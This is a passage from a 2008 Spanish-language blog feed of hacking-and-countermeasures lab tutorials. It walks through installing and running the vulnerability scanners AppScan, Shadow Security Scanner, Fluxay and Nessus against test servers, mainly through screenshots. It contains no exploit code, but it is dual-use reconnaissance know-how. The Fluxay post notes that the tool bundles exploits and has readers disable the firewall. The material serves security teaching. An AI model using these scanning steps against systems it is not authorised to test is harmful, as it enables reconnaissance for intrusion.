<p>La instalación no se diferencia mucho a una instalación común de Windows (el típico siguiente-siguiente)</p>
<p><a href="http://img187.imageshack.us/img187/1416/2appscancs6.jpg"><img src="http://img187.imageshack.us/img187/1416/2appscancs6.th.jpg" alt="" /></a></p>
<p>Aceptamos los términos de licencia y continuamos</p>
<p><a href="http://img134.imageshack.us/img134/7927/3appscanom8.jpg"><img src="http://img134.imageshack.us/img134/7927/3appscanom8.th.jpg" alt="" /></a></p>
<p>Pantalla de inicio de la herramienta AppScan (para este laboratorio, usé una versión antigua que tenía guardada)</p>
<p><a href="http://img293.imageshack.us/img293/7249/4appscanzu2.jpg"><img src="http://img293.imageshack.us/img293/7249/4appscanzu2.th.jpg" alt="" /></a></p>
<p>Ingresamos nuestra licencia</p>
<p><a href="http://img523.imageshack.us/img523/5536/5appscanfj7.jpg"><img src="http://img523.imageshack.us/img523/5536/5appscanfj7.th.jpg" alt="" /></a></p>
<p>Seleccionamos nuevo escanéo</p>
<p><a href="http://img243.imageshack.us/img243/6279/6appscangd4.jpg"><img src="http://img243.imageshack.us/img243/6279/6appscangd4.th.jpg" alt="" /></a></p>
<p>Inmediatamente procedemos a actualizar la base de datos de vulnerabilidades</p>
<p><a href="http://img523.imageshack.us/img523/8094/7appscanze3.jpg"><img src="http://img523.imageshack.us/img523/8094/7appscanze3.th.jpg" alt="" /></a></p>
<p>Entorno gráfico del aplicativo IBM Rational AppScan</p>
<p><a href="http://img212.imageshack.us/img212/8497/8appscanxq5.jpg"><img src="http://img212.imageshack.us/img212/8497/8appscanxq5.th.jpg" alt="" /></a></p>
<p>Identificamos en la herramienta nuestra máquina o sistema objetivo</p>
<p><a href="http://img393.imageshack.us/img393/3933/12appscanxj9.jpg"><img src="http://img393.imageshack.us/img393/3933/12appscanxj9.th.jpg" alt="" /></a></p>
<p>Para el laboratorio, haré uso del escanéo por defecto</p>
<p><a href="http://img505.imageshack.us/img505/376/10appscantl5.jpg"><img src="http://img505.imageshack.us/img505/376/10appscantl5.th.jpg" alt="" /></a></p>
<p><a href="http://img393.imageshack.us/img393/132/11appscanfg3.jpg"><img src="http://img393.imageshack.us/img393/132/11appscanfg3.th.jpg" alt="" /></a></p>
<p>Últimas configuraciones antes de dar inicio al escanéo</p>
<p><a href="http://img178.imageshack.us/img178/7066/13appscanaj6.jpg"><img src="http://img178.imageshack.us/img178/7066/13appscanaj6.th.jpg" alt="" /></a></p>
<p><a href="http://img178.imageshack.us/img178/3001/14appscanqk8.jpg"><img src="http://img178.imageshack.us/img178/3001/14appscanqk8.th.jpg" alt="" /></a></p>
<p>Tenemos la opción de guardar el perfil de escanéo</p>
<p><a href="http://img243.imageshack.us/img243/3138/17appscanba0.jpg"><img src="http://img243.imageshack.us/img243/3138/17appscanba0.th.jpg" alt="" /></a></p>
<p><a href="http://img212.imageshack.us/img212/1706/18appscangv8.jpg"><img src="http://img212.imageshack.us/img212/1706/18appscangv8.th.jpg" alt="" /></a></p>
<p>Guardando…</p>
<p><a href="http://img212.imageshack.us/img212/7862/19appscankz4.jpg"><img src="http://img212.imageshack.us/img212/7862/19appscankz4.th.jpg" alt="" /></a></p>
<p>Escanéo en ejecución</p>
<p><a href="http://img178.imageshack.us/img178/1441/20appscanku7.jpg"><img src="http://img178.imageshack.us/img178/1441/20appscanku7.th.jpg" alt="" /></a></p>
<p>Resultados en la misma pantalla</p>
<p><a href="http://img134.imageshack.us/img134/3117/21appscansr2.jpg"><img src="http://img134.imageshack.us/img134/3117/21appscansr2.th.jpg" alt="" /></a></p>
<p>Ahora veamos como generar un reporte en IBM Rational AppScan (clic en report)</p>
<p><a href="http://img393.imageshack.us/img393/7310/22appscancj6.jpg"><img src="http://img393.imageshack.us/img393/7310/22appscancj6.th.jpg" alt="" /></a></p>
<p>Las opciones disponibles a incluir en el reporte</p>
<p><a href="http://img103.imageshack.us/img103/9431/23appscanll7.jpg"><img src="http://img103.imageshack.us/img103/9431/23appscanll7.th.jpg" alt="" /></a></p>
<p>Nuestro primero reporte de IBM Rational AppScan</p>
<p><a href="http://img103.imageshack.us/img103/3672/24appscancg5.jpg"><img src="http://img103.imageshack.us/img103/3672/24appscancg5.th.jpg" alt="" /></a></p>
<p>Descripción del servidor objetivo</p>
<p><a href="http://img353.imageshack.us/img353/8376/25appscankn9.jpg"><img src="http://img353.imageshack.us/img353/8376/25appscankn9.th.jpg" alt="" /></a></p>
<p>Visualización de las vulnerabilidades encontradas</p>
<p><a href="http://img174.imageshack.us/img174/9710/26appscandc8.jpg"><img src="http://img174.imageshack.us/img174/9710/26appscandc8.th.jpg" alt="" /></a></p>
<p>Otra vista del reporte</p>
<p><a href="http://img168.imageshack.us/img168/2240/27appscanbo7.jpg"><img src="http://img168.imageshack.us/img168/2240/27appscanbo7.th.jpg" alt="" /></a></p>
<p>Visualización más técnica de las vulnerabilidades encontradas</p>
<p><a href="http://img147.imageshack.us/img147/6428/28appscanur7.jpg"><img src="http://img147.imageshack.us/img147/6428/28appscanur7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Sobra decir que el objetivo de este laboratorio es simplemente el de llevar a cabo un escaneo automatizado de vulnerabilidades, el tema de explotación de vulnerabilidades será cubierto en próximos laboratorios.</p>
<p style="text-align: justify;"><strong>Taller individual:</strong><br />
Uso de otras opciones de IBM Rational AppScan<br />
Consultar acerca de como llevar a cabo procesos de hardening de sistemas.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong> Escaneo de vulnerabilidades VII</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-vi/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Escaneo de vulnerabilidades V</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-v</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-v#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:51:47 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=65</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Recordemos antes la definición de escaneo de vulnerabilidades:</strong></p>
<p style="text-align: justify;">“Una vulnerabilidad en seguridad informática hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.” (<a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Continúa…</a>)</p>
<p style="text-align: justify;"><strong>Práctica 55 &#8211; Escaneo de vulnerabilidades con Shadow Security Scanner (SSS)<br />
Herramienta: </strong><a href="http://www.safety-lab.com/SSS.exe" target="_blank">SSS</a><strong><br />
</strong><strong>Prerequisitos:</strong> Ninguno<strong><br />
</strong><strong>Contramedidas: </strong><a href="http://es.wikipedia.org/wiki/Firewall" target="_blank">Firewalls</a>, seguridad en las listas de control de acceso (<a href="http://en.wikipedia.org/wiki/Access_control_list" target="_blank">ACLs</a>), <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">Bastion</a> Servers/Workstation (Hardening)<strong><br />
</strong><strong>Descripción: </strong>Shadow Security Scanner es un completísimo y efectivo escáner de vulnerabilidades para la plataforma de Windows nativa, aunque también examina servidores de cualquier otra plataforma revelando brechas en Unix, Linux, FreeBSD, OpenBSD y Net BSD.</p>
<p style="text-align: justify;"><span id="more-65"></span>Por su arquitectura, Shadow Security Scanner también descubre fallos en CISCO, HP y otros equipos de la red. Actualmente, los servicios analizados son: FTP, SSH, Telnet, SMTP, DNS, Finger, HTTP, POP3, IMAP, IRC, Windows Media Service, Terminal Service, NetBIOS, NFS, NNTP, SNMP, Squid, LDAP, HTTPS, SSL, TCP/IP, UDP y servicios del Registro.</p>
<p style="text-align: justify;">Lo análisis son muy rápidos y se ofrecen informes de cada una de las vulnerabilidades y sus posibles soluciones, además de actualizarse automáticamente a través de Internet.</p>
<p style="text-align: justify;">Veamos:</p>
<p style="text-align: justify;"><a href="http://www.safety-lab.com/en/products/securityscanner.htm" target="_blank">Descargamos</a> SSS desde la página oficial del producto (previo registro) ó desde <a href="http://www.safety-lab.com/SSS.exe" target="_blank">este</a> enlace (descarga directa).</p>
<p style="text-align: justify;"><a href="http://img112.imageshack.us/img112/1241/sss30gc8.jpg"><img src="http://img112.imageshack.us/img112/1241/sss30gc8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img411.imageshack.us/img411/9483/sss31mf3.jpg"><img src="http://img411.imageshack.us/img411/9483/sss31mf3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img70.imageshack.us/img70/6577/sss32xb1.jpg"><img src="http://img70.imageshack.us/img70/6577/sss32xb1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Una vez descargado procedemos a instalar la herramienta</p>
<p style="text-align: justify;"><a href="http://img244.imageshack.us/img244/6420/sss1pc5.jpg"><img src="http://img244.imageshack.us/img244/6420/sss1pc5.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Al igual que muchas de las aplicaciones para Windows, estas no se diferencian mucho en el momento de instalación. Seleccionamos el idioma de instalación</p>
<p style="text-align: justify;"><a href="http://img157.imageshack.us/img157/9972/sss2zs5.jpg"><img src="http://img157.imageshack.us/img157/9972/sss2zs5.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img243.imageshack.us/img243/6329/sss3im9.jpg"><img src="http://img243.imageshack.us/img243/6329/sss3im9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aceptamos los términos de licencia</p>
<p style="text-align: justify;"><a href="http://img74.imageshack.us/img74/9510/sss4uz5.jpg"><img src="http://img74.imageshack.us/img74/9510/sss4uz5.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img68.imageshack.us/img68/9673/sss5mf9.jpg"><img src="http://img68.imageshack.us/img68/9673/sss5mf9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img92.imageshack.us/img92/6358/sss6ch6.jpg"><img src="http://img92.imageshack.us/img92/6358/sss6ch6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img244.imageshack.us/img244/7541/sss7jx2.jpg"><img src="http://img244.imageshack.us/img244/7541/sss7jx2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Finalizada la instalación, ejecutamos por primera vez. En este caso el Firewall de windows no solicita autorización para acceder al demonio que incluye la herramienta</p>
<p style="text-align: justify;"><a href="http://img201.imageshack.us/img201/6872/sss8xe3.jpg"><img src="http://img201.imageshack.us/img201/6872/sss8xe3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para este Laboratorio haremos uso de las opciones más básicas de la herramienta, esperando que los investigadores profundicen en el uso de la misma. (Scanner)</p>
<p style="text-align: justify;"><a href="http://img201.imageshack.us/img201/8441/sss9te6.jpg"><img src="http://img201.imageshack.us/img201/8441/sss9te6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Wizard de escaneo de la herramienta, para este caso un escaneo completo y por defecto</p>
<p style="text-align: justify;"><a href="http://img301.imageshack.us/img301/2624/sss10xi7.jpg"><img src="http://img301.imageshack.us/img301/2624/sss10xi7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Adjuntamos el host objetivo del escaneo</p>
<p style="text-align: justify;"><a href="http://img59.imageshack.us/img59/5336/sss11se2.jpg"><img src="http://img59.imageshack.us/img59/5336/sss11se2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ingresamos la dirección IP ó el nombre del host</p>
<p style="text-align: justify;"><a href="http://img411.imageshack.us/img411/9135/sss12lx4.jpg"><img src="http://img411.imageshack.us/img411/9135/sss12lx4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img157.imageshack.us/img157/9636/sss13xe1.jpg"><img src="http://img157.imageshack.us/img157/9636/sss13xe1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Iniciamos entonces el escaneo</p>
<p style="text-align: justify;"><a href="http://img329.imageshack.us/img329/5800/sss14va2.jpg"><img src="http://img329.imageshack.us/img329/5800/sss14va2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Escaneo en ejecución. Este nos permite ir visualizando algunos resultados</p>
<p style="text-align: justify;"><a href="http://img503.imageshack.us/img503/6207/sss15ia2.jpg"><img src="http://img503.imageshack.us/img503/6207/sss15ia2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Finalización del escaneo de vulnerabilidades con SSS</p>
<p style="text-align: justify;"><a href="http://img70.imageshack.us/img70/6230/sss16wb9.jpg"><img src="http://img70.imageshack.us/img70/6230/sss16wb9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Algunos resultados</p>
<p style="text-align: justify;"><a href="http://img112.imageshack.us/img112/4663/sss17lq2.jpg"><img src="http://img112.imageshack.us/img112/4663/sss17lq2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Una de las mejores bondades de la herramienta SSS, es la posibilidad de generar completos reportes ejecutivos y técnicos. (Generar reporte)</p>
<p style="text-align: justify;"><a href="http://img70.imageshack.us/img70/7571/sss18hf4.jpg"><img src="http://img70.imageshack.us/img70/7571/sss18hf4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Adjuntamos la sesión a reportar</p>
<p style="text-align: justify;"><a href="http://img242.imageshack.us/img242/9804/sss19pt9.jpg"><img src="http://img242.imageshack.us/img242/9804/sss19pt9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img243.imageshack.us/img243/7522/sss20eq6.jpg"><img src="http://img243.imageshack.us/img243/7522/sss20eq6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Seleccionamos las opciones (módulos) disponibles en el reporte</p>
<p style="text-align: justify;"><a href="http://img411.imageshack.us/img411/8923/sss21hh3.jpg"><img src="http://img411.imageshack.us/img411/8923/sss21hh3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Formato de salida del reporte (html, pdf, xml, chm, etc)</p>
<p style="text-align: justify;"><a href="http://img112.imageshack.us/img112/3391/sss22rv6.jpg"><img src="http://img112.imageshack.us/img112/3391/sss22rv6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ruta de almacenamiento del reporte</p>
<p style="text-align: justify;"><a href="http://img301.imageshack.us/img301/7380/sss23qe3.jpg"><img src="http://img301.imageshack.us/img301/7380/sss23qe3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Visualización en modo Web del reporte de escaneo de vulnerabilidades al sistema Windows 2003 server como máquina objetivo</p>
<p style="text-align: justify;"><a href="http://img512.imageshack.us/img512/7479/sss241wt4.jpg"><img src="http://img512.imageshack.us/img512/7479/sss241wt4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img243.imageshack.us/img243/6868/sss25iq8.jpg"><img src="http://img243.imageshack.us/img243/6868/sss25iq8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img67.imageshack.us/img67/3283/sss26dw3.jpg"><img src="http://img67.imageshack.us/img67/3283/sss26dw3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img70.imageshack.us/img70/2821/sss27nr0.jpg"><img src="http://img70.imageshack.us/img70/2821/sss27nr0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Reporte generado de un escaneo a otro sistema objetivo (Linux)</p>
<p style="text-align: justify;"><a href="http://img411.imageshack.us/img411/6127/sss29rv1.jpg"><img src="http://img411.imageshack.us/img411/6127/sss29rv1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Sobra decir que el objetivo de este laboratorio es simplemente el de llevar a cabo un escaneo automatizado de vulnerabilidades, el tema de explotación de vulnerabilidades será cubierto en próximos laboratorios.</p>
<p style="text-align: justify;"><strong>Taller individual:</strong><br />
Uso de otras opciones de SSS<br />
Consultar acerca de como llevar a cabo procesos de hardening de sistemas.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong> Escaneo de vulnerabilidades VI</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-v/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Escaneo de vulnerabilidades IV</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iv</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iv#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:50:38 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=63</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Recordemos antes la definición de escaneo de vulnerabilidades:</strong></p>
<p style="text-align: justify;">“Una vulnerabilidad en seguridad informática hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.” (<a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Continúa…</a>)</p>
<p style="text-align: justify;"><strong>Práctica 54 &#8211; Escaneo de vulnerabilidades con Fluxay<br />
Herramienta: </strong><a href="http://www.netxeyes.com/Setup_Fluxay5.exe" target="_blank">Fluxay</a><strong><br />
</strong><strong>Prerequisitos:</strong> Ninguno<strong><br />
</strong><strong>Contramedidas: </strong><a href="http://es.wikipedia.org/wiki/Firewall" target="_blank">Firewalls</a>, seguridad en las listas de control de acceso (<a href="http://en.wikipedia.org/wiki/Access_control_list" target="_blank">ACLs</a>), <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">Bastion</a> Servers/Workstation (Hardening)<strong><br />
</strong><strong>Descripción: </strong>Fluxay es un programa de escaneo de vulnerabilidades en diversos sistemas operativos. Aunque es un escaner de vulnerabilidades poco conocido ofrece casi todas las prestaciones de otros escaners de vulnerabilidades.</p>
<p style="text-align: justify;"><span id="more-63"></span>Fluxay es una herramienta escrita por un analista de seguridad japonés. Incluye herramientas muy útiles relacionadas con la explotación de vulnerabilidades (SQL Remote Shell, Brute Force, etc.).<br />
Advierto que la herramienta debe ser utilizada con precaución y algunos antivirus pueden arrojar alertas con el archivo instalador, pues este contiene algunos exploits incluídos.</p>
<p style="text-align: justify;"><a href="http://www.netxeyes.com/Setup_Fluxay5.exe" target="_blank">Descargamos</a> a nuestro equipo el instalador de Fluxay</p>
<p style="text-align: justify;"><a href="http://img244.imageshack.us/img244/8905/56387089ur1.jpg"><img src="http://img244.imageshack.us/img244/8905/56387089ur1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Hacemos doble clic para proceder con la instalación</p>
<p style="text-align: justify;"><a href="http://img91.imageshack.us/img91/8458/50245322xy5.jpg"><img src="http://img91.imageshack.us/img91/8458/50245322xy5.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Aceptamos los términos de licencia</p>
<p style="text-align: justify;"><a href="http://img152.imageshack.us/img152/7603/42960880xv8.jpg"><img src="http://img152.imageshack.us/img152/7603/42960880xv8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Seleccionamos la ruta del instalador</p>
<p style="text-align: justify;"><a href="http://img143.imageshack.us/img143/7258/86916022xd4.jpg"><img src="http://img143.imageshack.us/img143/7258/86916022xd4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img170.imageshack.us/img170/2184/79371293iu4.jpg"><img src="http://img170.imageshack.us/img170/2184/79371293iu4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Instalación terminada con éxito</p>
<p style="text-align: justify;"><a href="http://img170.imageshack.us/img170/2081/42804722ek7.jpg"><img src="http://img170.imageshack.us/img170/2081/42804722ek7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img501.imageshack.us/img501/4964/71da1.jpg"><img src="http://img501.imageshack.us/img501/4964/71da1.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ahora vamos a ejecutar la herramienta Fluxay</p>
<p style="text-align: justify;"><a href="http://img174.imageshack.us/img174/2422/28755816fv3.jpg"><img src="http://img174.imageshack.us/img174/2422/28755816fv3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Para ello haremos uso del wizard de escaneo de vulnerabilidades incluído en Fluxay</p>
<p style="text-align: justify;"><a href="http://img74.imageshack.us/img74/4393/11186431mv2.jpg"><img src="http://img74.imageshack.us/img74/4393/11186431mv2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Seleccionamos el sistema objetivo (Sistema Operativo, posibles vulnerabilidades y servicios habilitados en el mismo, SMTP, POP3, FTP, IMAP, TELNET, SQL, IPC, IIS, etc.)</p>
<p style="text-align: justify;"><a href="http://img502.imageshack.us/img502/74/10ob7.jpg"><img src="http://img502.imageshack.us/img502/74/10ob7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img378.imageshack.us/img378/4784/111ju6.jpg"><img src="http://img378.imageshack.us/img378/4784/111ju6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img329.imageshack.us/img329/236/122ld0.jpg"><img src="http://img329.imageshack.us/img329/236/122ld0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img187.imageshack.us/img187/1649/13fx9.jpg"><img src="http://img187.imageshack.us/img187/1649/13fx9.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img60.imageshack.us/img60/6025/14sq3.jpg"><img src="http://img60.imageshack.us/img60/6025/14sq3.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img440.imageshack.us/img440/3514/15zd8.jpg"><img src="http://img440.imageshack.us/img440/3514/15zd8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img60.imageshack.us/img60/2034/16vj7.jpg"><img src="http://img60.imageshack.us/img60/2034/16vj7.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img244.imageshack.us/img244/3844/17lu4.jpg"><img src="http://img244.imageshack.us/img244/3844/17lu4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img329.imageshack.us/img329/8245/18fx8.jpg"><img src="http://img329.imageshack.us/img329/8245/18fx8.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img60.imageshack.us/img60/8049/19zr6.jpg"><img src="http://img60.imageshack.us/img60/8049/19zr6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;"><a href="http://img388.imageshack.us/img388/5733/20mo6.jpg"><img src="http://img388.imageshack.us/img388/5733/20mo6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Configuramos el daemon de Fluxay, por defecto viene desde nuestra propia máquina, para este caso lo dejaremos así</p>
<p style="text-align: justify;"><a href="http://img440.imageshack.us/img440/3893/21rh6.jpg"><img src="http://img440.imageshack.us/img440/3893/21rh6.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">En caso de tener activo el firewall de windows u otro, lo desactivaremos</p>
<p style="text-align: justify;"><a href="http://img354.imageshack.us/img354/8634/22wk0.jpg"><img src="http://img354.imageshack.us/img354/8634/22wk0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Escaneo en ejecución a un sistema objetivo con Windows 2003 server Enterprise Edition</p>
<p style="text-align: justify;"><a href="http://img295.imageshack.us/img295/1286/23oj0.jpg"><img src="http://img295.imageshack.us/img295/1286/23oj0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Ejecución del reporte de resultados</p>
<p style="text-align: justify;"><a href="http://img295.imageshack.us/img295/3286/24sm2.jpg"><img src="http://img295.imageshack.us/img295/3286/24sm2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Visualización del reporte en formato html (visualización en cualquier navegador web ej: IE, FF, Opera, etc)</p>
<p style="text-align: justify;"><a href="http://img292.imageshack.us/img292/4863/25jz4.jpg"><img src="http://img292.imageshack.us/img292/4863/25jz4.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Algunos puertos disponibles en el sistema objetivo que han sido encontrados por Fluxay</p>
<p style="text-align: justify;"><a href="http://img244.imageshack.us/img244/1061/26zx0.jpg"><img src="http://img244.imageshack.us/img244/1061/26zx0.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Posibles vulnerabilidades encontradas y explotables en el sistema objetivo (Para este caso relacionadas con Windows 2003 server)</p>
<p style="text-align: justify;"><a href="http://img182.imageshack.us/img182/1374/27kx2.jpg"><img src="http://img182.imageshack.us/img182/1374/27kx2.th.jpg" alt="" /></a></p>
<p style="text-align: justify;">Sobra decir que el objetivo de este laboratorio es simplemente el de llevar a cabo un escaneo automatizado de vulnerabilidades, el tema de explotación de vulnerabilidades será cubierto en próximos laboratorios.</p>
<p style="text-align: justify;"><strong>Taller individual:</strong><br />
Uso de otras opciones de Fluxay<br />
Consultar acerca de como llevar a cabo procesos de hardening de sistemas.</p>
<p style="text-align: justify;"><strong>Próxima sesión:</strong> Escaneo de vulnerabilidades V</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iv/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking &#8211; Técnicas y contramedidas &#8211; Escaneo de vulnerabilidades III</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iii</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iii#comments</comments>
		<pubDate>Wed, 13 Aug 2008 17:49:37 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=61</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>Recordemos antes la definición de escaneo de vulnerabilidades:</strong></p>
<p style="text-align: justify;">“Una vulnerabilidad en seguridad informática hace referencia a una debilidad en un sistema permitiendo a un atacante violar la confidencialidad, integridad, disponibilidad, control de acceso y consistencia del sistema o de sus datos y aplicaciones.” (<a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Continúa…</a>)</p>
<p style="text-align: justify;"><strong>Práctica 53 &#8211; Escaneo de vulnerabilidades con Nessus<br />
Herramienta: </strong><a href="http://www.nessus.org/nessus/" target="_blank">Nessus</a><strong><br />
</strong><strong>Prerequisitos:</strong> Ninguno<strong><br />
</strong><strong>Contramedidas: </strong><a href="http://es.wikipedia.org/wiki/Firewall" target="_blank">Firewalls</a>, seguridad en las listas de control de acceso (<a href="http://en.wikipedia.org/wiki/Access_control_list" target="_blank">ACLs</a>), <a href="http://www.securitysoftwarezone.com/how-bastion-hosts-work-review136-7.html" target="_blank">Bastion</a> Servers/Workstation (Hardening)<strong><br />
</strong><strong>Descripción: </strong>Nessus es un programa de escaneo de vulnerabilidades en diversos sistemas operativos. Consiste en nessusd, el daemon Nessus, que realiza el escaneo en el sistema objetivo, y nessus, el cliente (basado en consola o gráfico) que muestra el avance y reporte de los escaneos. Desde consola nessus puede ser programado para hacer escaneos programados con cron.</p>
<p style="text-align: justify;"><span id="more-61"></span>En operación normal, nessus comienza escaneando los puertos con nmap o con su propio escaneador de puertos para buscar puertos abiertos y después intentar varios exploits para atacarlo. Las pruebas de vulnerabilidad, disponibles como una larga lista de plugins, son escritos en NASL (Nessus Attack Scripting Language, Lenguaje de Scripting de Ataque Nessus por sus siglas en inglés), un lenguaje scripting optimizado para interacciones personalizadas en redes.</p>
<p style="text-align: justify;">Opcionalmente, los resultados del escaneo pueden ser exportados en reportes en varios formatos, como texto plano, XML, HTML, y LaTeX. Los resultados también pueden ser guardados en una base de conocimiento para referencia en futuros escaneos de vulnerabilidades.</p>
<p style="text-align: justify;">Algunas de las pruebas de vulnerabilidades de Nessus pueden causar que los servicios o sistemas operativos se corrompan y caigan. El usuario puede evitar esto desactivando “unsafe test” (pruebas no seguras) antes de escanear.<br />
<strong>Procedimiento:</strong> <a href="http://www.nessus.org/download/" target="_blank">Descargar</a>, instalar, configurar y ejecutar la herramienta definiendo el/los sistemas objetivos.</p>
<p style="text-align: justify;"><strong>Veamos:</strong></p>
